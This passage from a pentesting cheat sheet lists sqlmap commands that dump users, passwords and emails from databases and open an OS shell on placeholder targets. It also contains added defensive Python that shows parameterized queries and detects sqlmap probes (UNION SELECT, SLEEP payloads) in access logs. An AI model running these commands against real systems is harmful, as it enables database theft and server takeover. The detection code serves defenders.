4.3.6 SQLMap
sqlmap -r <REQUEST_FILE> -p <POST_PARAMETER>
sqlmap -r Post.req
sqlmap -u "http://<TARGET_IP>/sqli_1.php?title=hacking&action=search" --cookie "PHPSESSID=rmoepg39ac0savq89d1k5fu2q1; security_level=0" -p title
sqlmap -u "http://10.10.10.10/file.php?id=1" -p id #GET Method
sqlmap -u "http://10.10.10.10/login.php" --data="user=admin&password=admin" #POST Method
Get databases if an injection exists
sqlmap -r login.req --dbs
sqlmap -u "http://10.10.10.10/file.php?id=1" --dbs #determine the databases:
sqlmap -u "http://10.10.10.10/file.php?id=1" -p id --dbs #GET Method
sqlmap -u "http://10.10.10.10/login.php" --data="user=admin&password=admin" --dbs #POST Method
# List databases
sqlmap -u "http://<TARGET_IP>/sqli_1.php?title=hacking&action=search" --cookie "PHPSESSID=rmoepg39ac0savq89d1k5fu2q1; security_level=0" -p title --dbs
sqlmap -u "http://<TARGET_IP>/sqli_1.php?title=hacking&action=search" --cookie "PHPSESSID=rmoepg39ac0savq89d1k5fu2q1; security_level=0" -p title -D bWAPP --tables
sqlmap -u "http://<TARGET_IP>/sqli_1.php?title=hacking&action=search" --cookie "PHPSESSID=rmoepg39ac0savq89d1k5fu2q1; security_level=0" -p title -D bWAPP -T users --columns
sqlmap -u "http://<TARGET_IP>/sqli_1.php?title=hacking&action=search" --cookie "PHPSESSID=rmoepg39ac0savq89d1k5fu2q1; security_level=0" -p title -D bWAPP -T users -C admin,password,email --dump
Get Tables in a Database
sqlmap -r login.req -D dbname --tables #determine the tables:
sqlmap -u "http://10.10.10.10/file.php?id=1" -D dbname --common-tables #if table names cannot be enumerated, guess them from a list of common names
sqlmap -u "http://10.10.10.10/file.php?id=1" -p id -D dbname --tables #GET Method
sqlmap -u "http://10.10.10.10/login.php" --data="user=admin&password=admin" -D dbname --tables #POST Method
Get data from database tables
sqlmap -r login.req -D dbname -T table_name --dump
sqlmap -u "http://10.10.10.10/file.php?id=1" -p id -D dbname -T table_name --dump #GET Method
sqlmap -u "http://10.10.10.10/login.php" --data="user=admin&password=admin" -D dbname -T table_name --dump #POST Method
Get OS-Shell
sqlmap -u "http://10.10.10.10/file.php?id=1" --os-shell
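The commands above point sqlmap at the `id` parameter of `file.php`. The following added example (not from the original page and not part of sqlmap) shows, against a constructed in-memory SQLite table, why such a parameter is injectable when it is concatenated into the query text and why the same lookup with a bound parameter is not. The table, its rows, the probe value and the function names are assumptions made for the illustration.

```python
import sqlite3


def make_db():
    """Constructed in-memory table standing in for the backend behind file.php?id=1."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE files (id INTEGER PRIMARY KEY, name TEXT, owner TEXT)")
    conn.executemany(
        "INSERT INTO files VALUES (?, ?, ?)",
        [(1, "report.pdf", "alice"), (2, "payroll.xlsx", "bob"), (3, "notes.txt", "carol")],
    )
    return conn


def lookup_vulnerable(conn, file_id):
    """The request parameter is pasted into the SQL text, so its content is parsed as SQL.
    This is the pattern that sqlmap's boolean, union and time-based tests on -p id detect."""
    sql = f"SELECT id, name FROM files WHERE id = {file_id}"
    return conn.execute(sql).fetchall()


def lookup_parameterized(conn, file_id):
    """The value is bound by the driver; it is compared against the column, never parsed."""
    return conn.execute("SELECT id, name FROM files WHERE id = ?", (file_id,)).fetchall()


def lookup_validated(conn, file_id):
    """Defence in depth: reject anything that is not the expected integer before querying."""
    if not isinstance(file_id, str) or not file_id.isdigit():
        raise ValueError("id must be a positive integer")
    return lookup_parameterized(conn, int(file_id))


if __name__ == "__main__":
    db = make_db()
    probe = "1 OR 1=1"  # constructed boolean-style value of the kind an automated scanner sends
    print("vulnerable    :", lookup_vulnerable(db, probe))      # every row comes back
    print("parameterized :", lookup_parameterized(db, probe))  # no row equals the literal string
    try:
        lookup_validated(db, probe)
    except ValueError as err:
        print("validated     : rejected ->", err)
```

The parameterized version alone closes the injection; the validation wrapper is there so that a malformed value is refused at the edge and logged before it reaches the database at all.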
Examples of usage
Dumping emails from a table
sqlmap -u 'http://example.com/api/items/view?type_id=popular_items&data[0][item_id][from]=?&data[0][item_id][to]=' \
-p "data[0][item_id][to]" --dbms=mysql --level=5 --risk=3 \
--technique=EUBT -D ecommerce -T users -C email --dump
Common parameters
-u : The vulnerable URL.
-p : The parameter you suspect is injectable.
--dbms=mysql : You know the backend DBMS is MySQL.
--level=5 --risk=3 : Enables deeper and riskier tests.
--technique=EUBT : Restricts the type of SQLi techniques used (Error, Union, Boolean, Time-based).
-D ecommerce : Targeting the ecommerce database.
-T users : Looking into the users table.
-C email : Only extracting the email column.
--dump : Actually retrieves the data.
Listing columns of a table
sqlmap -u 'http://example.com/api/items/view?type_id=popular_items&data[0][item_id][from]=?&data[0][item_id][to]=' \
-p "data[0][item_id][to]" --dbms=mysql --level=5 --risk=3 \
--technique=EUBT -D ecommerce -T users --columns
Dumping usernames
sqlmap -u 'http://example.com/api/items/view?type_id=popular_items&data[0][item_id][from]=?&data[0][item_id][to]=' \
-p "data[0][item_id][to]" --dbms=mysql --level=5 --risk=3 \
--technique=EUBT -D ecommerce -T users -C username --dump
Listing columns of the users table again (can be used for planning further dumps)
sqlmap -u 'http://example.com/api/items/view?type_id=popular_items&data[0][item_id][from]=?&data[0][item_id][to]=' \
-p "data[0][item_id][to]" --dbms=mysql --level=5 --risk=3 \
--technique=EUBT -D ecommerce -T users --columns
Enumerating tables with a specific prefix/suffix (note: in sqlmap, --prefix and --suffix set the strings placed before and after the injection payload; they do not filter the table names that --tables returns)
sqlmap -u 'http://example.com/api/items/view?type_id=popular_items&data[0][item_id][from]=?&data[0][item_id][to]=' \
-p "data[0][item_id][to]" --dbms=mysql --level=5 --risk=3 \
--technique=EUBT --current-db --prefix="ecom_" --suffix="_log" --tables
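From the defending side, the runs described on this page are visible in the web server's access log. The added example below (not part of the original page and not part of sqlmap) parses a few constructed combined-format log lines and flags what an sqlmap run typically leaves behind: the tool's default User-Agent, SQL fragments inside a request parameter, and a burst of distinct values sent to one parameter from one client, which survives even when the User-Agent is changed. The log lines, the IP addresses, the version string in the User-Agent, the threshold and the function names are all assumptions.

```python
import re
from collections import defaultdict
from urllib.parse import urlsplit, parse_qsl

# Apache/nginx "combined" access-log format.
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>\S+) (?P<target>\S+) \S+" '
    r'(?P<status>\d{3}) \S+ "(?P<referer>[^"]*)" "(?P<ua>[^"]*)"$'
)

# Fragments that almost never occur in a legitimate value of a numeric or search parameter.
SQL_TOKENS = re.compile(
    r"(\bUNION\b.*\bSELECT\b|\bSLEEP\s*\(|\bBENCHMARK\s*\(|\b(?:AND|OR)\b\s+\d+\s*=\s*\d+|"
    r"information_schema|\bCAST\s*\(|\bCONCAT\s*\()",
    re.IGNORECASE,
)

# Constructed sample: one client probing file.php?id the way an automated scanner does,
# plus one ordinary visitor. Addresses, timestamps and the version string are made up.
SAMPLE_LOG = """\
203.0.113.7 - - [10/Oct/2023:13:55:36 +0000] "GET /file.php?id=1 HTTP/1.1" 200 512 "-" "Mozilla/5.0"
203.0.113.7 - - [10/Oct/2023:13:55:37 +0000] "GET /file.php?id=1%20AND%201%3D1 HTTP/1.1" 200 512 "-" "sqlmap/1.7.2#stable (https://sqlmap.org)"
203.0.113.7 - - [10/Oct/2023:13:55:37 +0000] "GET /file.php?id=1%20AND%201%3D2 HTTP/1.1" 200 498 "-" "sqlmap/1.7.2#stable (https://sqlmap.org)"
203.0.113.7 - - [10/Oct/2023:13:55:38 +0000] "GET /file.php?id=1%20UNION%20ALL%20SELECT%20NULL%2CNULL-- HTTP/1.1" 200 600 "-" "Mozilla/5.0"
203.0.113.7 - - [10/Oct/2023:13:55:39 +0000] "GET /file.php?id=1%20AND%20SLEEP%285%29 HTTP/1.1" 200 512 "-" "Mozilla/5.0"
198.51.100.4 - - [10/Oct/2023:13:56:01 +0000] "GET /file.php?id=2 HTTP/1.1" 200 480 "-" "Mozilla/5.0"
"""


def parse_line(line):
    """Return a dict for one combined-format line, or None if it does not parse."""
    m = LOG_RE.match(line)
    if not m:
        return None
    rec = m.groupdict()
    url = urlsplit(rec["target"])
    rec["path"] = url.path
    # parse_qsl percent-decodes once, so "1%20AND%201%3D1" becomes "1 AND 1=1".
    rec["params"] = parse_qsl(url.query, keep_blank_values=True)
    return rec


def classify(rec):
    """Per-request indicators: tool fingerprint and SQL fragments inside parameter values."""
    reasons = []
    if rec["ua"].lower().startswith("sqlmap"):
        reasons.append("default sqlmap User-Agent")
    for name, value in rec["params"]:
        if SQL_TOKENS.search(value):
            reasons.append(f"SQL tokens in parameter {name!r}")
    return reasons


def analyse(lines, burst_threshold=5):
    """Return (per-request findings, parameters that received a burst of distinct values)."""
    records = [r for r in map(parse_line, lines) if r]
    findings = []
    for r in records:
        reasons = classify(r)
        if reasons:
            findings.append((r["ip"], r["target"], reasons))
    # Even with a changed User-Agent and an obfuscated payload, an automated scanner sends
    # many distinct values to the same parameter from one client; count them per parameter.
    per_param = defaultdict(set)
    for r in records:
        for name, value in r["params"]:
            per_param[(r["ip"], r["path"], name)].add(value)
    bursts = {k: len(v) for k, v in per_param.items() if len(v) >= burst_threshold}
    return findings, bursts


if __name__ == "__main__":
    found, burst = analyse(SAMPLE_LOG.splitlines())
    for ip, target, reasons in found:
        print(f"{ip} {target}: {', '.join(reasons)}")
    for (ip, path, name), n in burst.items():
        print(f"{ip} sent {n} distinct values to {path}?{name}")
```

The per-request patterns are cheap and catch a default run; the per-parameter burst count is what remains useful once a tester supplies a custom User-Agent and tamper scripts, so in production the threshold would be applied over a sliding time window rather than the whole file.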